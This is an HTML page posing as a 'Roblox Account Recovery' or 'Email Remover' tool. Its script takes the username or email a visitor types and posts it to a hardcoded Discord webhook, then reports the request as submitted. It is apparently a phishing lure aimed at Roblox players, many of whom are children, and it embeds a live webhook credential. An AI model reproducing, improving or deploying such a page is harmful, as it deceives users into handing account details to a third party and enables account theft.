
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Roblox Account Recovery</title>
  <style>
    body {
      background: linear-gradient(to bottom, #000000, #001f3f);
      color: white;
      font-family: Arial, sans-serif;
      text-align: center;
      padding-top: 100px;
    }

    h1 {
      font-size: 2em;
      margin-bottom: 40px;
    }

    input {
      padding: 15px;
      font-size: 1em;
      width: 300px;
      border-radius: 8px;
      border: none;
      margin-bottom: 20px;
    }

    button {
      padding: 12px 24px;
      font-size: 1em;
      border-radius: 8px;
      background-color: #007bff;
      color: white;
      border: none;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <h1>Roblox Email Remover 13+</h1>
  <input type="text" id="userInput" placeholder="Enter your username or email">
  <br>
  <button onclick="submitData()">Submit</button>

  <script>
    function submitData() {
      const input = document.getElementById("userInput").value;

      if (!input.trim()) {
        alert("Please enter a valid username or email.");
        return;
      }

      fetch("https://discord.com/api/webhooks/1375168427542712421/Utte56jqrUGRl_V5-VuyoI4jAyMCoHMW52MaNVna4wpiYaRMMQodGLIjficdZ0wgKyO4", {
        method: "POST",
        headers: {
          "Content-Type": "application/json"
        },
        body: JSON.stringify({
          content: `New recovery request: ${input}`
        })
      })
      .then(response => {
        if (response.ok) {
          alert("Your request was submitted successfully.");
        } else {
          alert("There was an issue submitting your request.");
        }
      })
      .catch(error => {
        console.error("Error:", error);
        alert("Error sending request.");
      });
    }
  </script>
</body>
</html>
